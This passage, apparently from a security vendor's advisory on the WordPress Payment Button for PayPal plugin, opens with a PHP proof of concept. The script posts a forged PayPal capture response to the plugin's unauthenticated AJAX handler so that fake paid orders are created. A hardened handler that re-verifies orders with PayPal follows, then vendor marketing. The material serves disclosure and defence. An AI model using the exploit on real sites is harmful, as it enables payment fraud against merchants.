// Craft a JSON payload mimicking a PayPal order capture response.
// All fields are attacker-controlled. The `action` parameter routes the
// request to the unauthenticated (nopriv) AJAX handler; without it
// admin-ajax.php answers "0" and nothing is processed.
$payload = array(
    'action' => 'wppaypalcheckout_pp_api_capture_order',
    'data'   => json_encode(array(
        'order_id' => 'FAKE-PAYPAL-ORDER-ID-123',
        'checkoutvar' => array(
            'custom' => 'Attacker-controlled custom data',
            'variation' => 'fake_variation'
        ),
        'payer' => array(
            'email_address' => 'attacker@example.com', // Receipt sent here
            'name' => array(
                'given_name' => 'John',
                'surname' => 'Doe'
            )
        ),
        'purchase_units' => array(
            array(
                'description' => 'Fake Product Name',
                'amount' => array(
                    'value' => '0.01',
                    'currency_code' => 'USD'
                ),
                'payments' => array(
                    'captures' => array(
                        array(
                            'id' => 'FAKE-PAYPAL-TXN-ID-456', // Saved as _txn_id
                            'status' => 'COMPLETED'
                        )
                    )
                )
            )
        )
    ))
);

// Initialize cURL session and send the form-encoded POST
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));

// Execute the request to trigger order creation
$response = curl_exec($ch);
if ($response === false) {
    echo "cURL error: " . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check response. admin-ajax.php returns 200 for most handler outcomes, so
// the body (and the Posts -> WP PayPal Order screen) is the real indicator.
if ($http_code == 200) {
    echo "Request sent. Check if a fake order was created in the WordPress admin (Posts -> WP PayPal Order).\n";
    echo "Response: " . $response . "\n";
    // A successful JSON response with 'success:true' indicates the plugin processed the request.
} else {
    echo "Request failed with HTTP code: " . $http_code . "\n";
}

?>
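The root problem the PoC above exercises is that the handler persists whatever capture JSON the browser posts in `data`. The following hardened handler is an added illustration written for this page; it is not code from the Payment Button for PayPal plugin, from Atomic Edge, or from the vendor's 1.2.3.42 fix. It keeps the endpoint reachable by guests (checkout is unauthenticated by nature) but treats only the `order_id` as client input, re-fetches the order from PayPal's Orders v2 REST API with the merchant's own credentials, and rejects anything PayPal does not report as `COMPLETED`. Assumptions are labelled in the code: the `hardened_*` function names, the nonce action `wp_paypal_checkout_nonce`, the post type `wp_paypal_order`, the meta key `_txn_id` (the PoC comment says the capture ID is saved under that key), the option keys `app_client_id`, `app_secret_key` and `test_mode` from the diff above, and the argument shape passed to `wp_paypal_checkout_process_order`.

```php
<?php
// Added illustration, not the plugin's code: a hardened replacement for the
// wp_ajax_nopriv_wppaypalcheckout_pp_api_capture_order handler. Function names
// prefixed hardened_ are hypothetical. Requires WordPress (wp_remote_*, WP_Error).

// Pick the PayPal REST host from the plugin's test_mode option. The sandbox
// credential option keys are not shown on this page, so this example assumes
// app_client_id / app_secret_key are valid for whichever host is selected.
function hardened_paypal_api_base() {
    $options = wp_paypal_checkout_get_option();
    $sandbox = isset($options['test_mode']) && $options['test_mode'] === '1';
    return $sandbox ? 'https://api-m.sandbox.paypal.com' : 'https://api-m.paypal.com';
}

// client_credentials grant: POST /v1/oauth2/token with HTTP Basic client_id:secret.
function hardened_paypal_access_token() {
    $options = wp_paypal_checkout_get_option();
    if (empty($options['app_client_id']) || empty($options['app_secret_key'])) {
        return new WP_Error('not_configured', 'PayPal API credentials missing');
    }
    $response = wp_remote_post(hardened_paypal_api_base() . '/v1/oauth2/token', array(
        'headers' => array(
            'Authorization' => 'Basic ' . base64_encode($options['app_client_id'] . ':' . $options['app_secret_key']),
            'Accept'        => 'application/json',
        ),
        'body'    => array('grant_type' => 'client_credentials'),
        'timeout' => 15,
    ));
    if (is_wp_error($response)) {
        return $response;
    }
    $json = json_decode(wp_remote_retrieve_body($response), true);
    if (wp_remote_retrieve_response_code($response) !== 200 || empty($json['access_token'])) {
        return new WP_Error('token_failed', 'Could not obtain PayPal access token');
    }
    return $json['access_token'];
}

// Authoritative order record: GET /v2/checkout/orders/{id}.
function hardened_paypal_fetch_order($order_id) {
    $token = hardened_paypal_access_token();
    if (is_wp_error($token)) {
        return $token;
    }
    $response = wp_remote_get(hardened_paypal_api_base() . '/v2/checkout/orders/' . rawurlencode($order_id), array(
        'headers' => array('Authorization' => 'Bearer ' . $token, 'Accept' => 'application/json'),
        'timeout' => 15,
    ));
    if (is_wp_error($response)) {
        return $response;
    }
    if (wp_remote_retrieve_response_code($response) !== 200) {
        return new WP_Error('order_not_found', 'PayPal did not return the order');
    }
    return json_decode(wp_remote_retrieve_body($response), true);
}

function hardened_capture_order_handler() {
    // A nonce blocks cross-site forgery, but any visitor can read one off the
    // checkout page, so it is not the authorization control by itself.
    check_ajax_referer('wp_paypal_checkout_nonce', 'nonce'); // nonce action name is an assumption

    $raw         = isset($_POST['data']) ? wp_unslash($_POST['data']) : '';
    $client_data = json_decode($raw, true);
    if (!is_array($client_data) || empty($client_data['order_id'])) {
        wp_send_json_error('Missing order_id', 400);
    }
    // The only client value used is the order ID; everything else comes from PayPal.
    $order_id = sanitize_text_field($client_data['order_id']);
    $order    = hardened_paypal_fetch_order($order_id);
    if (is_wp_error($order)) {
        wp_send_json_error($order->get_error_message(), 502);
    }
    $capture = $order['purchase_units'][0]['payments']['captures'][0] ?? null;
    if (($order['status'] ?? '') !== 'COMPLETED' || ($capture['status'] ?? '') !== 'COMPLETED') {
        wp_send_json_error('Order is not captured', 402);
    }
    // Reject replays: one PayPal capture ID maps to at most one local order
    // (post type and meta key are assumptions, see lead-in).
    $existing = get_posts(array(
        'post_type'   => 'wp_paypal_order',
        'post_status' => 'any',
        'meta_key'    => '_txn_id',
        'meta_value'  => $capture['id'],
        'fields'      => 'ids',
        'numberposts' => 1,
    ));
    if (!empty($existing)) {
        wp_send_json_error('Duplicate capture', 409);
    }
    // Hand PayPal's record, not the browser's, to the existing processing hook
    // (argument shape assumed to match what the original handler consumed).
    do_action('wp_paypal_checkout_process_order', $order);
    wp_send_json_success(array('order_id' => $order_id, 'txn_id' => $capture['id']));
}
add_action('wp_ajax_nopriv_wppaypalcheckout_pp_api_capture_order', 'hardened_capture_order_handler');
add_action('wp_ajax_wppaypalcheckout_pp_api_capture_order', 'hardened_capture_order_handler');
```

With this in place the PoC's fabricated `FAKE-PAYPAL-ORDER-ID-123` fails at `hardened_paypal_fetch_order()` because PayPal has no such order, and a real but already-processed order is refused by the `_txn_id` lookup, so replaying a genuine capture response does not create a second order. The amount and currency to bill against should likewise be read from the fetched `purchase_units[].amount` and compared with the site's price for the item, not taken from the request.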

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School